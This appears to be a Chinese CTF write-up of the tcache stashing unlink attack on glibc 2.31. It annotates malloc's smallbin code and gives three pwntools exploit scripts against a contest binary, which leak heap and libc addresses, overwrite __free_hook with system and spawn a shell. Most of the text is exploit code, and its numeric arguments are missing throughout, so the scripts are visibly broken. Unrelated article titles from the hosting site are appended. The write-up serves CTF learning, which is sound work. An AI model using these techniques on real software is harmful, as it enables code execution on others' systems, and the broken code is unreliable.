今年校赛有点可惜,最后两道质量不错的pwn每做出来,总的来说还是我太菜了,希望下次校赛能AK pwn题。不过这次校赛也没有白打,还是有学到新的东西的。在这里感谢出题的学长。

glibc-2.29以后unsortbin attack不能用了,不过可以通过把多余的chunk移入tcache实现。下面从源码分析一下具体原理。注意:接下来分析的源码版本都是glibc-2.31的。

直接看smallbin部分

    if (in_smallbin_range (nb))

    {

        idx = smallbin_index (nb);

        bin = bin_at (av, idx);

        if ((victim = last (bin)) != bin)

        {

            bck = victim->bk;

            if (__glibc_unlikely (bck->fd != victim)) //检测是否构成双向链表

                malloc_printerr ("malloc(): smallbin double linked list corrupted");

            set_inuse_bit_at_offset (victim, nb);   //给物理相邻的高地址chunk设置prev_inuse标志位

            //将符合的chunk从链表中取出来

            bin->bk = bck;

            bck->fd = bin;

            if (av != &main_arena)

                set_non_main_arena (victim);

            check_malloced_chunk (av, victim, nb);

#if USE_TCACHE

            /* While we're here, if we see other chunks of the same size,

               stash them in the tcache.  */

            size_t tc_idx = csize2tidx (nb);

            if (tcache && tc_idx < mp_.tcache_bins)

            {

                mchunkptr tc_victim;

                /* While bin not empty and tcache not full, copy chunks over.  */

                while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) //需要mp_.tcache_count来推出循环,否则会报错

                {

                    if (tc_victim != )

                    {

                        bck = tc_victim->bk;

                        set_inuse_bit_at_offset (tc_victim, nb);  //给物理相邻的高地址chunk设置prev_inuse标志位

                        if (av != &main_arena)                    //不是主分配区设置non_main_arena标志

                            set_non_main_arena (tc_victim);

                        bin->bk = bck;

                        bck->fd = bin;

                        tcache_put (tc_victim, tc_idx);

                    }

                }

            }

#endif

            void *p = chunk2mem (victim);

            alloc_perturb (p, bytes);

            return p;

        }

    }

下面我们用一个图来解释一下:

假如有如左边的smallbin链表,如果我们修改chunk1的bk指针,使其指向target address-0x10,接下来malloc(chunk2)。由于smallbin还有剩下的chunk,所以会把剩余的chunk放入tcahce。这时就可以在target address处写入smallbin的地址。

  • 为了防止程序崩溃,对应大小tcahce bin中必须已有6个chunk,即stash一个chunk后就会因tachce bin满了结束stash。
  • 在修改chunk1的bk指针时不能破坏fd指针,所以这个利用方法一般要求能泄漏heap_base。

接下里放一道例题,这是今年校赛的题目。链接:https://github.com/countfatcode/countfatcode.github.io/tree/master/%E9%A2%98%E7%9B%AE/ZJGSUCTF2020/books

程序就不分析了,总体的利用思路就是利用tcache stashing unlink attack修改大小,然后绕过验证,利用malloc函数实现在__free_hook中写入system。然后getshell。脚本如下:

#-*- coding:utf- -*-

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./books')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.sendlineafter('name? ', 'yuan')

def Buy(index, size, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendlineafter('content? ', str(size))

    p.sendafter('input your content: ', content)

    p.sendlineafter('want a receipt? [y/n] ', 'n')

def Sell(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

def Write(index, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendafter('content: ', content)

def Read(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index)) 

def Magic(data):

    p.sendlineafter('Your choice: ', str(0xdeadbeef))

    p.sendafter('Here is a magic place.\n', data)

Buy(, 0x120, 'AAAAA\n')

Buy(, 0x120, '/bin/sh\x00\n')

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

############################  leak heap_base ######################

Read()

#raw_input('#')

p.recvuntil("book's content: ")

heap_base = u64(p.recv() + '\x00\x00') - 0x2d0

info("heap_base ==> " + hex(heap_base))

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

################# leak libc_base #################

Read()

p.recvuntil("book's content: ")

libc_base = u64(p.recv().ljust(, '\x00')) - 0x1ebbe0

info("libc_base ==> " + hex(libc_base))

malloc_hook = libc_base + libc.sym['__malloc_hook']

info("malloc_hook ==> " + hex(malloc_hook))

system_addr = libc_base + libc.sym['__libc_system']

info("system_addr ==> " + hex(system_addr))

free_hook = libc_base + libc.sym['__free_hook']

info("free_hook ==> " + hex(free_hook))

#布置好free_hook

Buy(, 0x233, 'AAAA\n')

Sell()

Write(, p64(free_hook) + '\x00'* + '\n')

Buy(, 0x140, 'AAAA\n')

#在tcache中放6个chunk,为下面tcache stash做准备

Buy(, 0x100, 'AAAA\n')

Buy(, 0x140, 'AAAA\n')

for i in range():

    Sell()

    Write(, '\x00'*0x20 + '\n')

Sell()

#接下来的目标是在smallbin中放入两个0x240大小的chunk

for i in range():

    Buy(, 0x310, 'AAAA\n')

    Sell()

for i in range():

    Buy(, 0x310, 'AAAA\n')

    Buy(, 0x200, 'AAAA\n') #防止free时被top chunk合并

    Sell()

    Buy(, 0x200, 'AAAAA\n') #split chunk

    Buy(, 0x110, '/bin/sh\x00\n')

payload = '\x00'*0x200 + p64() + p64(0x111) + p64(heap_base+0x21f0) + p64(heap_base+0x44)

Write(, payload)

Buy(, 0x100, 'AAAA\n') #tcache stash

Magic('AAAA\n')

Magic(p64(system_addr) + '\x00\n')

Sell()

p.interactive()

解法二:

利用tachebin最多可以放7个chunk的机制绕过小于的限制。脚本如下:

#-*- coding:utf- -*-

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./books')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.sendlineafter('name? ', 'yuan')

def Buy(index, size, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendlineafter('content? ', str(size))

    p.sendafter('input your content: ', content)

    p.sendlineafter('want a receipt? [y/n] ', 'n')

def Sell(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

def Write(index, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendafter('content: ', content)

def Read(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index)) 

def Magic(data):

    p.sendlineafter('Your choice: ', str(0xdeadbeef))

    p.sendafter('Here is a magic place.\n', data)

for i in range():

    Buy(, 0x230, 'AAAA\n')

    Sell()

Buy(, 0x230, 'AAAAA\n')

Buy(, 0x100, 'AAAA\n')

Sell()

Read()

p.recvuntil('content: ')

libc_base = u64(p.recv() + '\x00\x00') - 0x1ebbe0

info("libc_base ==> " + hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']

system_addr = libc_base + libc.sym['system']

Write(, p64(free_hook) + '\x00\x00'* + '\n')

Buy(, 0x100, '/bin/sh\x00\n')

Magic('AAAAA\n')

Magic(p64(system_addr))

Sell()

p.interactive()

解法三:

由于题目没有限制好,在malloc chunk时可以输入索引4,直接可以绕过小于5的限制,接下来的利用方法和解法二类似。

#-*- coding:utf- -*-

from pwn import *

context(os = 'linux', arch = 'amd64', log_level = 'debug', terminal = ['tmux', 'splitw', '-h'])

p = process('./books')

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.sendlineafter('name? ', 'yuan')

def Buy(index, size, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendlineafter('content? ', str(size))

    p.sendafter('input your content: ', content)

    p.sendlineafter('want a receipt? [y/n] ', 'n')

def Sell(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

def Write(index, content):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index))

    p.sendafter('content: ', content)

def Read(index):

    p.sendlineafter('Your choice: ', '')

    p.sendlineafter('book? ', str(index)) 

def Magic(data):

    p.sendlineafter('Your choice: ', str(0xdeadbeef))

    p.sendafter('Here is a magic place.\n', data)

Buy(, 0x233, 'AAAA\n')

Sell()

Buy(, 0x120, 'AAAAA\n')

Buy(, 0x120, '/bin/sh\x00\n')

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Write(, '\x00'*0x120)

Sell()

Read()

p.recvuntil("book's content: ")

libc_base = u64(p.recv().ljust(, '\x00')) - 0x1ebbe0

info("libc_base ==> " + hex(libc_base))

malloc_hook = libc_base + libc.sym['__malloc_hook']

info("malloc_hook ==> " + hex(malloc_hook))

system_addr = libc_base + libc.sym['__libc_system']

info("system_addr ==> " + hex(system_addr))

free_hook = libc_base + libc.sym['__free_hook']

info("free_hook ==> " + hex(free_hook))

Buy(, 0x233, 'AAAA\n')

Sell()

Write(, p64(free_hook))

Buy(, 0x120, '/bin/sh\x00\n')

raw_input('@')

Magic('AAAA\n')

Magic(p64(system_addr) + '\x00\n')

Sell()

p.interactive()

Tcahce Stashing Unlink Attack的更多相关文章

  1. glibc2.29以上 IO_FILE 及 house of pig

    摆烂很长时间之后,终于下定决心来看点新的东西.正好 winmt 师傅前不久把他 pig 修好的附件发给我了,我就借此来学习一下新版本的 IO_FILE 及 house of pig. 新版本的 IO_ ...

  2. 2021能源PWN wp

    babyshellcode 这题考无write泄露,write被沙盒禁用时,可以考虑延时盲注的方式获得flag,此exp可作为此类型题目模版,只需要修改部分参数即可,详细见注释 from pwn im ...

  3. PHP filesystem attack vectors - Take Two

    http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ Did you enjoyed our previous &q ...

  4. TSec《mysql client attack chain》

    从这个议题学到挺多,攻击手法的串联. 1.mysql Client Attack 这个攻击手法去年就爆出来了,本质就是mysql协议问题,在5步篡改读取客户端内容,导致任意文件读取,如下图所示. 修改 ...

  5. Unlink学习总结

    Unlink 本文参考了CTF-wiki 和glibc 源码 原理: 我们在利用 unlink 所造成的漏洞时,其实就是借助 unlink 操作来达成修改指针的效果. 我们先来简单回顾一下 unlin ...

  6. Linux堆溢出漏洞利用之unlink

    Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话 ...

  7. unlink和close关系

    今天看到nginx用文件锁实现互斥的实现方案时,发现,unlink文件后还可需用fd,很是纳闷!于是搜索到此文,并自测了下,涨姿势了~分享给大家~ 原理: 每一个文件,都可以通过一个struct st ...

  8. 【Cocos2d-x for WP8 学习整理】(2)Cocos2d-Html5 游戏 《Fruit Attack》 WP8移植版 开源

    这一阵花了些时间,把 cocos2d-html5 里的sample 游戏<Fruit Attack>给移植到了WP8上来,目前已经实现了基本的功能,但是还有几个已知的bug,比如WP8只支 ...

  9. Web 服务器 low bandth DOS attack

    https://www.owasp.org/images/0/04/Roberto_Suggi_Liverani_OWASPNZDAY2010-Defending_against_applicatio ...

随机推荐

  1. 智能问答中的NLU意图识别流程梳理

    NLU意图识别的流程说明 基于智能问答的业务流程,所谓的NLU意图识别就是针对已知的训练语料(如语料格式为\((x,y)\)格式的元组列表,其中\(x\)为训练语料,\(y\)为期望输出类别或者称为意 ...

  2. FSAF

    Feature Selective Anchor-Free Module for Single-Shot Object Detection https://zhuanlan.zhihu.com/p/5 ...

  3. CornerNet

    论文 CornerNet: Detecting Objects as Paired Keypoint

  4. 自己动手编写一个Mybatis插件:Mybatis脱敏插件

    1. 前言 在日常开发中,身份证号.手机号.卡号.客户号等个人信息都需要进行数据脱敏.否则容易造成个人隐私泄露,客户资料泄露,给不法分子可乘之机.但是数据脱敏不是把敏感信息隐藏起来,而是看起来像真的一 ...

  5. 45道Promise面试题

    来看看通过阅读本篇文章要点: Promise的几道基础题 Promise结合setTimeout Promise中的then.catch.finally Promise中的all和race async ...

  6. Flutter简介

    Flutter简介 Flutter 是 Google推出并开源的移动应用开发框架,主打跨平台.高保真.高性能.开发者可以通过 Dart语言开发 App,一套代码同时运行在 iOS 和 Android平 ...

  7. OptaPlanner的新约束表达方式 Constraint Streams

    有好些时间没有写过关于OptaPlanner的东西了,其实近半年来,OptaPlanner还是推出了不少有用.好用的新特性.包括本文讲到的以Stream接口实现评分编程.关于OptraPlanner的 ...

  8. Banner信息收集

    一.什么是Banner Banner信息,欢迎语,在banner信息中可以得到软件开发商,软件名称.版本.服务类型等信息,通过这些信息可以使用某些工具直接去使用相对应的exp去攻击. 前提条件:需要和 ...

  9. Windows server 2008R2 中sql server的搭建

    一.安装sql server Step1:下载sql server 2008 r2 standard,解压到Windows的C:\下. Step2:打开安装程序,进行sql server的安装 Ste ...

  10. Jmeter 常用函数(4)- 详解 __setProperty

    如果你想查看更多 Jmeter 常用函数可以在这篇文章找找哦 https://www.cnblogs.com/poloyy/p/13291704.html 前言 有看我之前写的 Jmeter 文章的童 ...